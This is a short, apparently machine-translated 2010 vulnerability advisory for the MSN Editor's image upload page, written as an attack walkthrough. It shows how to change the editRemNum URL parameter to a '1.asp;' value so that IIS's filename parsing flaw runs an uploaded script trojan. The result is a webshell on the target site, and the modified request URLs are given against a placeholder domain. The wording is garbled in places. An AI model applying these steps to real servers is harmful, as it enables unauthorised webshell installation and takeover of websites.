MSN Editor vulnerability-vulnerability warning-the black bar safety net

2010-03-01T00:00:00
ID MYHACK58:62201026277
Type myhack58
Reporter 佚名
Modified 2010-03-01T00:00:00

Description

This editor believe that we all run into, the background there is nodatadatabase backup, there's nothing you can directly Upload a webshell place, shabby to only one editor interface.

!

Simple to say under the use of the method. Click on the image upload will appear after the upload page, the address is

http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=

With ordinary picture after uploading, the address is http://www.xxx.cn/news/uppic/41513102009204012_1.gif

Remember this time the path

Click on the picture to upload, this time the address becomes a http://www.xxx.cn/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=4 1 5 1 3 1 0 2 0 0 9 2 0 4 0 1 2

Obviously. The picture of the address is based on the RemNum behind the number generation.

The use is very simple with IIS resolvedvulnerability, the RemNum later modify the data for the 1. asp;4 1 5 1 3 1 0 2 0 0 9 2 0 4 0 1 2

Into the following this address

http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=1. asp;4 1 5 1 3 1 0 2 0 0 9 2 0 4 0 1 2

Then in the browser open

Then select your scriptTrojanto upload

Will be returned to the following address uppic/1. asp;41513102009204012_2.gif

And then directly open is our pony address!